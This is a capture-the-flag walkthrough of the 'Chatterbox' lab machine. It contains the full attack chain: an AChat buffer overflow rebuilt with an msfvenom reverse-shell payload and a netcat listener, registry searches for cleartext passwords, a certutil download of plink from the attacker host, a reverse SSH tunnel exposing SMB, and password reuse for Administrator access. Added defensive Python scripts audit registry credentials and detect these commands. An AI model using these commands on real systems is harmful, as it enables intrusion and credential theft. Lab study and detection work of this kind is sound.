Chatterbox

Resources for this video:

Achat Exploit - https://www.exploit-db.com/exploits/36025

Achat Exploit (Metasploit) - https://www.rapid7.com/db/modules/exploit/windows/misc/achat_bof

GREAT RESOURCE:

Privilege Escalation - Windows · Total OSCP Guide (gitbooks.io)

  • nothing to connect to
  • no website
  • only thing is services running

searchsploit the services you don’t know:

searchsploit achat

buffer overflow? Copy the script into a folder you know:

cp /usr/share/exploitdb/exploits/windows/remote/36025.py achat3.py

Yellow (/usr/share/exploitdb/) - default path

Purple (exploits/windows/remote/36025.py) - shown in searchsploit result

Brown (achat3.py) - what I wanna copy it as

mousepad to read what it does:

mousepad achat3.py

change the msfvenom command to actually get a shell instead of opening a calculator:

msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

after:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

run it and copy the buffer it produces to replace the one in the python script.

Update the script IP with the victim machine IP:

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

Run NetCat on 443 like we set up in the MSFVenom command:

nc -nvlp 443

run the script:

./achat3.py

Navigate shell to user desktop:

cd c:\users\Alfred\Desktop
type user.txt

find info to priv escalate:

systeminfo
net user

To check a user for admin priv:

net user alfred

dual homed (multiple IPs):

ipconfig

connections running:

netstat -ano
Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       352
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       456
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       1360
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       464

445 is listening but wasn't reachable from outside (only internally), and 445 is SMB
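The netstat listing above is the whole basis for the pivot, so it is worth triaging it systematically. The following is an added example, not part of the original notes: it parses the `netstat -ano` listing shown above, labels each listener (135 is MSRPC, 445 is SMB served by the System process, 49152+ is the RPC dynamic range) and splits them into what an external scan saw, what is bound to all interfaces but was never seen from outside (a host firewall, which is exactly the 445 case here), and what is loopback-only. `EXTERNAL_OPEN` is a constructed assumption standing in for the ports an external nmap reported open.

```python
"""Triage a `netstat -ano` listing: which TCP listeners exist, what they
probably are, and which ones an external scan never saw.

Added example, not part of the original notes. NETSTAT_SAMPLE is the listing
from the notes above; EXTERNAL_OPEN is a constructed assumption standing in
for the TCP ports an external nmap scan reported open.
"""
import re

NETSTAT_SAMPLE = """\
Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       352
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       456
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       1360
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       464
"""

# Constructed assumption: the TCP ports an external port scan of the box reported open.
EXTERNAL_OPEN = {9255}

# Well-known Windows listeners; 49152-65535 is the RPC dynamic port range.
KNOWN_PORTS = {135: "MSRPC", 139: "NetBIOS-SSN", 445: "SMB", 3389: "RDP", 5985: "WinRM"}

LISTEN_RE = re.compile(
    r"^\s*TCP\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)


def service_name(port):
    if port in KNOWN_PORTS:
        return KNOWN_PORTS[port]
    if 49152 <= port <= 65535:
        return "RPC dynamic"
    return "unknown"


def parse_listeners(text):
    """Return one dict per LISTENING TCP line: addr, port, pid, service."""
    listeners = []
    for line in text.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue
        port = int(m.group("port"))
        listeners.append({
            "addr": m.group("addr"),
            "port": port,
            # PID 4 is the System process: SMB is served by the kernel srv driver
            "pid": int(m.group("pid")),
            "service": service_name(port),
        })
    return listeners


def classify(listeners, external_open):
    """Split listeners into three buckets:
    exposed       - bound to all interfaces and seen open from outside
    filtered      - bound to all interfaces but not seen from outside
                    (host firewall or a limited scan); reachable once you
                    are on the host, which is why the notes pivot to 445
    loopback_only - bound to 127.0.0.1 / ::1, never reachable remotely
    """
    buckets = {"exposed": [], "filtered": [], "loopback_only": []}
    for l in listeners:
        if l["addr"] in ("127.0.0.1", "::1"):
            buckets["loopback_only"].append(l)
        elif l["port"] in external_open:
            buckets["exposed"].append(l)
        else:
            buckets["filtered"].append(l)
    return buckets


if __name__ == "__main__":
    for bucket, items in classify(parse_listeners(NETSTAT_SAMPLE), EXTERNAL_OPEN).items():
        for l in items:
            print(f"{bucket:14} {l['addr']}:{l['port']:<6} pid={l['pid']:<5} {l['service']}")
```

Run it against a real `netstat -ano` dump by pasting the output into `NETSTAT_SAMPLE` and the scanned ports into `EXTERNAL_OPEN`; anything that lands in `filtered` is a service the host firewall is hiding and a candidate both for the pivot described below and, from the defender's side, for a firewall rule review.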

Can we get a password?

check registry for passwords (from resource):

reg query HKLM /f password /t REG_SZ /s

we get:

Welcome1!

Query the autologin (Winlogon):

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

We know that the password is for user Alfred but he isn’t really admin or anything.
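The two registry queries above (the recursive `/f password` search and the Winlogon key) are also what a defender should be running on their own hosts. The following is an added example, not part of the original notes: it parses `reg query` text, reports every REG_SZ value whose name contains "password", and audits the Winlogon key for AutoAdminLogon with a cleartext DefaultPassword (the supported fix is to store the password as the DefaultPassword LSA secret, e.g. with Sysinternals Autologon, or to turn autologon off). The sample output is constructed, including the password value.

```python
"""Audit `reg query` output for cleartext credentials.

Added example, not from the original notes. Parses the text that
`reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"`
prints and reports whether AutoAdminLogon is enabled with a DefaultPassword
stored as a readable REG_SZ. SAMPLE_REG_OUTPUT is constructed.
"""
import re

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample of what `reg query` prints (not captured from the box).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    DefaultDomainName    REG_SZ    CHATTERBOX
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    S3cret-example
    Shell    REG_SZ    explorer.exe
"""

# reg query value lines are indented: <name>    <REG_type>    <data>
_VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s*(?P<data>.*)$")


def parse_reg_query(text):
    """Return {value_name: (type, data)} for a single-key `reg query` dump."""
    values = {}
    for line in text.splitlines():
        m = _VALUE_RE.match(line)
        if m:
            values[m.group("name")] = (m.group("type"), m.group("data").strip())
    return values


def find_password_values(text):
    """Mimic `reg query HKLM /f password /t REG_SZ /s` over a multi-key dump:
    report every non-empty REG_SZ value whose *name* contains 'password'
    (the real /f also matches key names and data; this keeps to value names)."""
    hits, current_key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current_key = line.strip()
            continue
        m = _VALUE_RE.match(line)
        if m and m.group("type") == "REG_SZ" and "password" in m.group("name").lower():
            data = m.group("data").strip()
            if data:
                hits.append((current_key, m.group("name"), data))
    return hits


def audit_autologon(text):
    """Classify the Winlogon key.

    enabled   - AutoAdminLogon is "1"
    user      - DOMAIN\\user that would be logged on
    cleartext - DefaultPassword is present as REG_SZ, readable by any local
                user; the LSA-secret form that Sysinternals Autologon writes
                does not show up in `reg query`
    findings  - human-readable list
    """
    v = parse_reg_query(text)
    enabled = v.get("AutoAdminLogon", ("", "0"))[1] == "1"
    domain = v.get("DefaultDomainName", ("", ""))[1]
    user = v.get("DefaultUserName", ("", ""))[1]
    cleartext = "DefaultPassword" in v and v["DefaultPassword"][0] == "REG_SZ"
    who = f"{domain}\\{user}" if domain else user
    findings = []
    if enabled and cleartext:
        findings.append(f"AutoAdminLogon enabled for {who} with cleartext DefaultPassword; "
                        "move the secret to LSA (Sysinternals Autologon) or disable autologon")
    elif cleartext:
        findings.append("stale DefaultPassword value left in Winlogon; delete it")
    elif enabled:
        findings.append(f"AutoAdminLogon enabled for {who}; password held outside the registry value")
    return {"enabled": enabled, "user": who, "cleartext": cleartext, "findings": findings}


if __name__ == "__main__":
    for key, name, data in find_password_values(SAMPLE_REG_OUTPUT):
        print(f"{key}\n    {name} = {data}")
    for f in audit_autologon(SAMPLE_REG_OUTPUT)["findings"]:
        print("FINDING:", f)
```

Pipe a saved `reg query ... /s` dump into either function; `find_password_values` gives the same hit list the notes got by hand, and `audit_autologon` explains why the Winlogon hit matters and what the fix is.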

Password reuse/Pass the pass/Pass spraying!!

How can we attack the internal 445 (SMB)?

Port Forward:

Download plink and start a web server on Kali to serve it from:

cd Downloads
ls | grep plink
python3 -m http.server 8080

Put Plink on the victim machine:

cd c:\users\alfred
certutil -urlcache -f http://10.10.14.13:8080/plink.exe plink.exe
dir

(dir is just to make sure it copied)

*DON’T FORGET THE PORT IF IT’S NOT 80

ON KALI:

sudo apt install ssh
service ssh start

EDIT SSH CONFIG TO LOGIN AS ROOT:

sudo mousepad /etc/ssh/sshd_config

Change PermitRootLogin:

#PermitRootLogin Prohibited
to
PermitRootLogin yes

Then restart:

sudo service ssh restart
sudo service ssh start

ON THE VICTIM:

plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.13

FROM KALI:

*MIGHT HAVE TO KEEP HITTING ENTER UNTIL YOU GET A RETURN BECAUSE OF THE FUNKY BOXCEPTION

Check connection:

netstat -ano | grep 445
winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
whoami
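Both host-side steps of the pivot above (certutil pulling plink over HTTP, then plink opening a reverse `-R` tunnel with `-pw` on the command line) leave clear marks in process-creation telemetry. The following is an added example, not part of the original notes: two detection rules run over constructed Sysmon-style Event ID 1 lines (tab-separated `field=value`, field names borrowed from Sysmon, lines written for this example), with a benign certutil invocation included to show the rule does not fire on it.

```python
"""Spot the two host-side steps used above in process-creation telemetry:
certutil pulling a file over HTTP and plink opening a reverse (-R) tunnel.

Added example, not part of the original notes. The events are constructed in
a simplified Sysmon Event ID 1 style (tab-separated field=value pairs).
"""
import re

SAMPLE_EVENTS = [
    "EventID=1\tImage=C:\\Windows\\System32\\certutil.exe"
    "\tCommandLine=certutil -urlcache -f http://10.10.14.13:8080/plink.exe plink.exe"
    "\tUser=CHATTERBOX\\Alfred\tProcessId=1234",
    "EventID=1\tImage=C:\\Users\\alfred\\plink.exe"
    "\tCommandLine=plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.13"
    "\tUser=CHATTERBOX\\Alfred\tProcessId=1240",
    # benign certutil use: no -urlcache, no URL
    "EventID=1\tImage=C:\\Windows\\System32\\certutil.exe"
    "\tCommandLine=certutil -verify C:\\temp\\cert.cer"
    "\tUser=CHATTERBOX\\Alfred\tProcessId=1300",
    "EventID=1\tImage=C:\\Windows\\System32\\cmd.exe"
    "\tCommandLine=cmd.exe /c dir"
    "\tUser=CHATTERBOX\\Alfred\tProcessId=1310",
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def parse_event(line):
    """Turn 'k=v<TAB>k=v' into a dict; the first '=' splits key from value."""
    fields = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def detect(event):
    """Return the list of rule names that fire for one event."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    args = cmd.split()
    lowered = [a.lower() for a in args]
    hits = []
    # Rule 1: certutil as a downloader (LOLBin): -urlcache plus a URL argument.
    if image == "certutil.exe" and "-urlcache" in lowered and URL_RE.search(cmd):
        hits.append("certutil_download")
    # Rule 2: plink -R <remote_port>:<host>:<port> publishes a local service on
    # the far side of the SSH session; -pw puts the password in the command line.
    if image == "plink.exe":
        for i, a in enumerate(args):
            if a == "-pw":
                hits.append("plink_cleartext_password")
            if a == "-R" and i + 1 < len(args):
                spec = args[i + 1].split(":")
                if len(spec) == 3 and spec[0].isdigit() and spec[2].isdigit():
                    hits.append(f"plink_reverse_tunnel:{spec[1]}:{spec[2]}")
    return hits


def scan(lines):
    """Run every rule over every event; keep only events with at least one hit."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        hits = detect(ev)
        if hits:
            alerts.append({"pid": ev.get("ProcessId"), "user": ev.get("User"),
                           "image": ev.get("Image"), "hits": hits})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a["pid"], a["user"], ", ".join(a["hits"]))
```

The tunnel rule reports the forwarded destination (`127.0.0.1:445` here), which is the detail an analyst needs to see that SMB on the host was just exposed to wherever the SSH session terminates; the certutil rule keys on `-urlcache` together with a URL rather than on certutil alone, so routine certificate work does not alert.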